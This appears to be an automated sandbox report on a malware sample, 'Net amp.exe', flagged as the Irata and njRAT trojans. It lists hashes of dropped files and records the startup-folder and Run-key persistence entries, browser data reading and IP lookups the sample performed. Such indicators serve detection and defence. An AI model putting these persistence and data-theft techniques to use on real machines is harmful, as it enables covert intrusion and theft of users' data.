C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00006f

MD5 34d5015941e4901485c7974667b85162
SHA1 cf032e42cf197dcc3022001a0bde9d74eb11ac15
SHA256 5c166a5d40aeefd0679a14f95e47ff28824e66abba82adfa30be41803cc25632
SHA512 42cef1d6847f535a6e8afc0469b9f5ef79ce4ab21512ac7eeda8ef9667d5f24bb33b30aba9a29824b3d853d41d4addf6bdee2042cf4fbd0a033b61657c671f0c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00006d

MD5 b6f2477774cfd6083843da83b25da97f
SHA1 9f4066223734b5bc49b7cad3eecb32882f8b6b4e
SHA256 21bdff50508cfd26a67e576664a6100ac5c53b8578e1470d31c89a2dc07c8fde
SHA512 f6f90d298f2ec842b22fffe1483c231a1185d3dc8440ec54cd3f9efd3c61a0bdfcb4a188fd4d6a0570cd83995074feb946c3cd4d84232f1ca0669555fff882d1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000070

MD5 6df4b22798770ab0a4fbdfde60337cd9
SHA1 7b74c71626e8aab27ba0c627d9cc7d17d0baea83
SHA256 724b53c5be6bf6ac13fdc315f74e10e833da9efc11bb1e36c63b099ff7ee75be
SHA512 a6a38ef091f07c453e68971bd1b0d7d3041bb7630275800d452f75ab935432b25066c2ccad0f90ecc4cfed20d8a88e5e12ae03ccf6b0791b3e0fa832986f15a3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00006e

MD5 2437fe22acc419e7adf50d17ab7a114f
SHA1 51d7a7465486b80a9bca63f4b0f7770af86b87fa
SHA256 5646a066a39c023bb51004452490b83db7ba2a3f29c1cd2633d1a089206c3932
SHA512 e2f472ea6dddbb9a227c3b7b3e01599df04adb819620844352f4c9bfe776735795d164a79d92d11956ca4f95ca7c6311189c3976e16f47dfe4c71df3190ffaf0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b4680fd8b6626b85ff122e1f850d34e5
SHA1 d53e381de96aea924602672aadb7c15c8e12afdf
SHA256 299e0690ea070bede6cbf58ee99e3ba9e2df0c36da43e49228026d63f7624602
SHA512 6577cfa5ed795a7486c11e35dde32264b6d4e901d6d9da1ed908f000cabd4218e14db3fcfc5a65fb44ce22ce5f46f771b7c6354814235eb5842298b68af04f10

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1c0de05e4ca908b22d67379ca590c76a
SHA1 e977e81d721be0db62f3bb64f0610e1d2ddddd87
SHA256 f959b226bfc12a81db62c03f124cbc2ec80aee4378db38befe7f33c52879537a
SHA512 86fbec24ec37dbb5efef9dd663aa4b48e003bc1ef2f88b09c1464154a1d878e10a4772d3a67137fc924e634f7e022c8691befb1259f1df792b8cc49a6d111a51

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a45e8f85a112cf3293848c55acdd3844
SHA1 d38e616c51a82c949636f0729bd20317bece82cb
SHA256 1737428199b126fd990fa5e03434bbe77b04cd84483f743ffb0eeaefd59fd3ff
SHA512 af76521aebf8e4b22511c243f060776f8cb2dd624c2edd90f2ad3d0c49a2a83298dd17b68572c5e76e43aaeb148350ef72ff0fac598ed87ede1ecb1619edeba3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6bd2a84adef74f98ea87a5ae6688b4a4
SHA1 86dabb24f2c8ef4bb2fffa0b46759150fd7bc72e
SHA256 2b0874dc76c0468574e3a6a2a660ac1c86a9613d2ace7b279d9375add2e9be35
SHA512 fdd5fa702c91372c82741d7df7d92b30b47924b6861ae220a3a0cccb4f2e10c8e1b9fad38433dc7bea923a2490a8820878b35bca9c518121bf83043bede09b02

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\60dd2cf2-2ac7-4d89-a22d-474a88f6c77e.tmp

MD5 f882a0864436cd9fab9a0c296edd7086
SHA1 03a167ac09ae90db95e84952d68dce7e7c60f7f7
SHA256 bed2c409b2b8a5bdf2138062ea77ca91a68d9b8c9266118fac8af1bdcea0ed17
SHA512 4e26f33b8485d458024fdf007cb701246605d8c23eaa679d9e2a474f0b6adea19cf289d6129d0b07d70757dfad9d65f7ac77683b560e2817352f3fa3f0f455bf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 5fcd8c9eccef18eed1ed2b79e1861b95
SHA1 771e41e94409ee14d2e2f62c98ce33642354f422
SHA256 9549133c2d5a4a48678bbe2e865a2c2869667930d409630e9739fc831e815148
SHA512 9805aa9d2a00305198a85d2c8a83a4032375f07fefd5dd4ed1414396f113229f15bec7646c609397d3d3d9d9bfb7f5935182636cdce8dd5f295c4d1d09879afe

C:\Users\Admin\Downloads\Unconfirmed 570179.crdownload

MD5 54daad58cce5003bee58b28a4f465f49
SHA1 162b08b0b11827cc024e6b2eed5887ec86339baa
SHA256 28042dd4a92a0033b8f1d419b9e989c5b8e32d1d2d881f5c8251d58ce35b9063
SHA512 8330de722c8800ff64c6b9ea16a4ff7416915cd883e128650c47e5cb446dd3aaa2a9ba5c4ecda781d243be7fb437b054bbcf942ea714479e6cc3cef932390829

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 497d880d7e907a53fbc2152d9217f24f
SHA1 7a48b7330b5ee8528fb4042bba5f7e6fbed97297
SHA256 364a288235994dca1cff5c5021b55f26a30d2f1e96aa638599bbda1df7b2a1bd
SHA512 30fec21bb95bfe61a4e1e1fb5c1231bf84f866f701db1f705352eba3fa3f09109f0ff028f7a7ac68767c17dfbe229f27492fa05016235f8bd6c226f02901d390

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 1e9f59f3af7e6a0a8942746556e4f71a
SHA1 05e98983df7bdebbfd8af2354c18b776490df272
SHA256 50fb0a1f212ed557d9e2935b3b2205629d26592e41313ce87276e0871645acac
SHA512 3d1408e9f649d77290828aa0d73e86f2405cbf0b0cb9d990119e66ae23971662b6304ef99715fc3a695a9d2a1d23996d8c5f88794af6b7e58288442e36e67232

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\7aa6f210408509b0_0

MD5 03646954db9c574c0425a35a5fe1113c
SHA1 c7f340b2ca805c2da3e705092abdcf37aa0a243f
SHA256 6ddf4221d3bd5cbd8d5d8da9f50154a02dad61638ea5cef615b88c64102b45ca
SHA512 e819f9d9fbfb1c44d5c19da0c37999646fdd2db3d11ac9bc5fcae51ecbccbe92861a2d5e1e15fd8cf4fa38d6987fcacc9c6be53a6e16642f5b5590f1f4cc13af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\883337a9a3972683_0

MD5 bb3694de74c74869c288280d486730b3
SHA1 cb67fee1096491219bc08b1409f4506f4a41b2e6
SHA256 109159cf3cdfa32f88f032e291348f414c4d7f0eabda238a32c0384e03001d36
SHA512 317c1bdff583c5092a472dde6da7e562be18e6aff25df2b766670552ee9311e1bfcf2239702d259be96d5ab37dee4e6835166e173e7ee6530894a3f9c990b977

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 77b378eece5f42e4d8f6e76c1b73d937
SHA1 797e7ea6df9056bdfdb106a3eab9d829318b015a
SHA256 532705094a2f5b53cbc978cf1238c273f6a0f3fb0ef3a3d88a201fadcb058aa5
SHA512 edd3eca1171bdc38f765fc2114dffd7472eebcc56ae792ea14db455c1c05b6ed3d7d784685865db5c50fac1101c5451e41eacb7d677c5507ae5cbd40c7589dec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\7a3bc656a6150409_0

MD5 bc9f2d61573146eb0032e8feba44c458
SHA1 6df0369bad7b07a7a19c16013c5f8cd25cea5b8a
SHA256 7a0c356c3fbf01b382406870680caed2f84a7b58355c368a87510ce7f1e0dcba
SHA512 666a2e31d1c90ae6e3f762895e30daa7e295fe6d70cf5cc9715bbe607630d8ad243fc6f3c5ba6455776e797d3265723e355b9b823f5572eb833495e8489993e8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\7cdcc79e5625f6d6_0

MD5 56053bd2569bc1005abbb1c39fa6e9a2
SHA1 05f157022df2b7bf1c23c27388f1647e1422d220
SHA256 7fbd9818c42782b7ad1d59735dfedacd7336041819aeb3597218a49ec6bdd25d
SHA512 df63c3caa1bf007115ee1a6dbb1efcc8d1183f85a43ae8ae634166d6c8bab3df1d823b71168f03c8732230f935b933e733a090fe6214c0342ac7e28ecce470c8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b7a0c41b0ef30fa6_0

MD5 a2833c1557fb63743a8f3a423eb8fc8f
SHA1 ed63d4eab65f9e8cedf0b585f3e044e12781cdaf
SHA256 dffa37f84888727e8d37d44b9a309b673764946104b1c884ec6f71b8d724d47c
SHA512 f40fb74fb4fd613f695b264739f02201661a6e4eaeb04fafefe32662c534244ef3699193f7cbab89933125bf06e0b0214f4fc5f157a7a40f8e1e7af4b4e7b4b7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000075

MD5 15431df212da04109e3b19b8b6d36e36
SHA1 f810edb1b37d97e32e33feb24f42bef3de23d39c
SHA256 add39a3cfe0edb72fcff431f9d3c2d588453a44651b6c24e4d0c4d8661a13f6c
SHA512 5a1d2ac3e1660c9bd291e216d1811b440053ada23707d6b8693f1a3052cef7f3022a4bdc1ea2312ee2824b75ba2c43a4c338e5f997fecc3195ac4620fafdf41a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000077

MD5 d515d6bc712ab2550aa6d7131c8383ab
SHA1 0af98d7d426d6d6513dbc7a9be5e46d56449ef68
SHA256 2a8b445262abbb4ba7712e0877acb65efa322dd8bbecf8cf18cf5ac082bc66f6
SHA512 9bb81b56b85e5af6e75dc513ae3c0d98ef91114efb370da5b132b687de38f2d78a3c799b5f5179e8179c2ef147ac41e11f98449bd79e4c22ce9ec5e49dca294c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000079

MD5 fad9cec0fde2833ed2800632c86d7f9a
SHA1 b96a38eb56cea124184d19679724d33387feb6e1
SHA256 5e7a1a0b57cd0287dee788d8a3dcbc586d3bc978c51cc97c160541b4c3397084
SHA512 dc5605c9054e87c21e390dabc95fa5f98ad4550c1ef4e6bbf45131ef5ff49b1ac9f777ed41c473fade4b8d2667a3955e4d10ad1075991dd2c6613199669d7d77

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00007a

MD5 470ab5fb0fd1493903a002130ca991ff
SHA1 72326a97af9ecb08399283c2757a59e448b392eb
SHA256 ca1254b42cb9991149006e8b366ef751722d2fb482ae7c9a5b7c6d4242e95376
SHA512 93347719d3a7d015968a83e98f2d25d556382acb58862578798ee62c3d48aa42828a82708d8d0b7afcd014db8fa464c9c52822eb50b0b946aa96b8c367a95f3f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 dfa3add56060e68d37d7ac1b1034b1bb
SHA1 376212d0751b83dd1051518667f91255ce179597
SHA256 bddb689e2047f155b6f22d0f8249a1f27fafd1941a0f5fc419166b7c3fd2c54a
SHA512 b1c3a644d9e73346d8ce01392402a30b7d9b05b4f63ff69628e25723c61a6d8d9df416bdebfe4f53f2301e299a04e6c119a561c4744e0ce47046633c301c824c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9de13ec52851c191b74f2400844a8064
SHA1 740289143857279e1b0eeb894fbd40b5102bf888
SHA256 aa83348bd980ffa037deca2344ea197e5cecb571111c5bfde84867008c202fbe
SHA512 b8ad546deeb5bebc5b23fcb7ff8efd82b4582798ad72c88f767059388d7c07b1e306d281e8dfb1ab933e54621d47e736538722f726351039f0b433fb0ebd463b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\15478963-d02d-42f7-85eb-3143ef478b95.tmp

MD5 ee78945055ee98a8eaec0fe9cc7fd2c3
SHA1 8c9ea96a4cdf9fd6eb6a72a22501702489672239
SHA256 b9137ef69da902ef245be27fa7ef1f02ae52c8bc0171372dbabd2959d05e431b
SHA512 2544057c88a266f7b87238bbad8ce3dc29865b24ac3af81cf60e4e869becf0456d1d36ce62d2ffb2803155439499dcc1653e0a01abeb71b9e77b2b3e6b065fb6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 5d95dc6e0aeb500ab0edecfcf5fdbf39
SHA1 584593f90f98e156fcdf0f0684818925e851261f
SHA256 07722e22efc2d6826dd333357a6b5fe7cb4f9df1ab2ff06152e4b58a80389a42
SHA512 1802f929921ee3372a004a745afacfe210edf6f417f81299d530d43bed1a3c6d872ea87d1f92287ee8b575599725d03ff13a5a286da5701f57b7e547b8d18641

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8ab31ec6c7d16cfa0db853a62561be73
SHA1 a684a639e4ae993a51fbc329af91eadfd2cbe828
SHA256 75d9b24731f10ea58f2013ccbc65fbb368c246c8e23177c47c99835ecb498c61
SHA512 d0634fb023a8f452d6118562e9fc54be7c963d4bdb7a41d042e14e8adb17d713501147ac5f2ca4b30633dd081a1bf26f9ff2c248b92ea43d324046191a915fc4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f2a142dc4854ce1efdea0e748aadc5ca
SHA1 687961a393c1abb1ae1c19e1d0e6d2d9aa1a71a3
SHA256 d5c7b00b92c690f6632f855dd94395182149538d2e0e91b7f611b67a371048ac
SHA512 460b5825da724a0825348bc93d9fcf427cb901cf0f1a451da313b7312583ca92550eee8e554f19cf41003a434aa448e08f325944ab44162564c4664fda1613da

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 95d91848e1731cc2f30331d2a9903630
SHA1 0740c06b0b91c1211a83be9d6fa7002dce3a1e47
SHA256 93122d30ecbe734e6e26a7393dc5a1903e68ce30bdfa8c6759a2304c48f4011b
SHA512 0473cc66d9122258585c43fb91a0f7b004084944b158f28e464cc934ca71c708bc47fafe44c5079d97c66d99a26cbd1c5dd6c40d6b92b95a7b640f229ecebd77

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 758b2d30c3859724f91efcd834e5d3ca
SHA1 b353646f8cd6d2e3fb10f29f4c3805169c44309a
SHA256 1094938c135ae618137c5d64022226fae85a20cc75b50f097268ccb8c886845f
SHA512 a7675c5e06d3498d7914de222e7c42a75ed2e8d46eeb94bc77561844f6194753e1c2dcb766e714608ddf22072b7b77da8b9a21c66904082fe9d74764c46e9a84

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9634f6c915374c4bc456af2ed61d0a56
SHA1 fe78f4b75617dcb813ecc42eebcc6ee2f79d3799
SHA256 565945317e1d1534a93ba71ad6727727742fe0b8ca23e93f13128904d76d748f
SHA512 5e4da8ccb4079f74cdcce901d4603eece3de8c06c5f564b91e1dcde83fbc01d6f47184494c5f3e0bf4cfce9fb6c3c101225271749381e6fba3891f78d6472f51

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\bfd702d6-2dfb-4e67-bede-ac8f34c14d8d.tmp

MD5 1de056e6bfb5ede30a54c23816eb539a
SHA1 ffaa06e780eb75fdb2ef42e3a1472debeeddf10d
SHA256 7a4dc65bd18f47d9b591f99a918a1d5f5658540ed60801f86395afe523ceedf1
SHA512 e37204e109d1a5b25174c50c31b76c47e23f6be8ac030e9d7c27ffd04fc3b8776630a8e447aa74d1887a985abff74720573ca73b4aaf10bf26567db241430aef

memory/2600-6265-0x00000000063E0000-0x00000000064E0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f81bab1899c7fc81eb08ba5a9c6a79e1
SHA1 6212c067332116847a8e006c561ef655eac72b51
SHA256 ae75abf4f88752aa0f5a52656a29b52662ccd1bcf0206581b536cd66cf3030c7
SHA512 b02233e9163d692664691ac6c25bf64784d95ab3e6d883d822bc33ed559314ea3923a8ade31bf4c7fd517e2e0a53847500924fdc64b036d7c18650b6ddd66ca3

memory/2600-6275-0x00000000063E0000-0x00000000064E0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a76e735e3cbeb2126427ff44335ad00c
SHA1 4e90c9d10c9cd857721985be994df08eacdf8ce0
SHA256 e576aad1c0de9922c065a073c028685204ed971baf21d235f59e29c4a7dd925a
SHA512 0d31927dd90170f65368f94ad23c7bae6e74a1b12e66bcc0e96a8512d939d658a6148b5abaaec6965f6f2a86e16f177d170be4a2701f2b76a6aa646b9d82a958

memory/2600-6294-0x0000000005450000-0x000000000545C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 cac2a7628bf64469136b0a0b3d18138b
SHA1 dba1c9c43ef8561dc85ab0a5fca36f776ab9a237
SHA256 8b2264610bec0e22941c8ef9512273ea6d799b2356ef0aa54e04e343f2885e1f
SHA512 1976567fe4fcecb798138fd04d6905ca0e7fa1c2be3ed4e11e686ca61f52a3dcdf0b7d0014cf8061120b81fc16647793148c9d12effec28e0d10c55b7865ab3b

C:\Users\Admin\AppData\Local\Temp\zpnkxzuffe.gif

MD5 cbb9590c3c824ed7640036059761808b
SHA1 9067df99ca0300db504eb5ad6c18d9fc74f81bfe
SHA256 d687470aacc68ef7d3960a4fdcadc672a6549ba129b6cd01ec6a06a0b01ea0d1
SHA512 bd6792bbbe383459cd88a1ec307a1cba0223a9a626c37eabb6f7a922323eab199a16184eb5db064bbcae4db00f0d066076fe296d9e4f5b89571fae536be3c713

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c1096b3616d17c31ac5b13e4dc95e7da
SHA1 f1f52306dd28c7eabeb91b3e2e6ad1fcacdbfb85
SHA256 c84c37f524ee2e0a11abd13cc73afc59700e32302f7e38ec6e2907f086a803e6
SHA512 66c5302fbd35ffcb726ac930f5e5a26701dca0e3cf87bee89f48e5ec2e224e891f38c2c815d7564d9909e95ed9ecedac358d829ad76b07cc053f098a02217350

C:\Users\Admin\AppData\Local\Temp\yjwmacodlq.gif

MD5 7a82a73df39e8cd074af61cdf06b6d62
SHA1 d8d467fedcb72ac4889dbc4c5775a933e74c12b9
SHA256 723ccbfc38d7113cb63b136af8d9a70eca14eebeb11bfd878488ae6fcdb59140
SHA512 ddd6c75e4f720960626005e0521adf677fe885f6c78faaa96aa870791c50ba6f8bb86aac358cb1177f02da22bcfc0895f0e4162aed26860d9d5454463af45ec0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 237577c059169b46d1032e4524471bee
SHA1 895fad3c513d3a9379298c976c77153398be7990
SHA256 65cdc7d3c5115940f98752d5f8fcb67a981a35b4cd3ca92fdc52bddd4180f3db
SHA512 8b182670c8c5ecb64cb0a4daecc7bac763124cf07f48afecabcac8260ee89277b9016cdc8157a888fa2c67ca2bf2d53f76265d52f7124388adebfc9d99bffe75

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 20:08

Reported

2023-12-18 20:39

Platform

win10v2004-20231215-en

Max time kernel

1802s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Net amp.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

njRAT/Bladabindi

trojan njrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\Downloads\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start_WSlAND = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_WSlAND.vbs" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\Net amp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\System Settings Broker.exe" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Process Hacker 2\plugins\ExtendedServices.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-5HEOE.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-K9HJP.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-FEC5Q.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\ProcessHacker.exe C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\ExtendedNotifications.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\SbieSupport.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\UserNotes.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-UCH0P.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-U8AEP.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\x86\ProcessHacker.exe C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\Updater.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-FDGBI.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\peview.exe C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\HardwareDevices.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\OnlineChecks.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\ToolStatus.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\WindowExplorer.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-MG768.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\x86\is-4FMG8.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-6TTO2.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
